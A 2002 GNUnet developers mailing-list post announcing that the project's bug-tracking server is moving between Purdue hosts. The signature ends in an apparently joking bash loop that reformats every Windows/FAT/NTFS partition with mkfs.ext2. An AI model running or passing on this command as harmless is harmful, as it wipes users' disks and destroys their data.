[GNUnet-developers] bugtracking / gecko services

From: Christian Grothoff
Subject: [GNUnet-developers] bugtracking / gecko services
Date: Fri, 24 May 2002 13:56:56 -0500

Hi all!

The server that currently hosts our bugtracking system is changing
the network, we're moving from gecko.cs.purdue.edu to geezy.cs.purdue.edu.
The alias 'ovmj.org' will undergo an IP change. Thus bugtracking and
the webpage will potentially be unavailable for a (hopefully) short time.

The CVS repository will be moved later (with a separate anouncement).

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"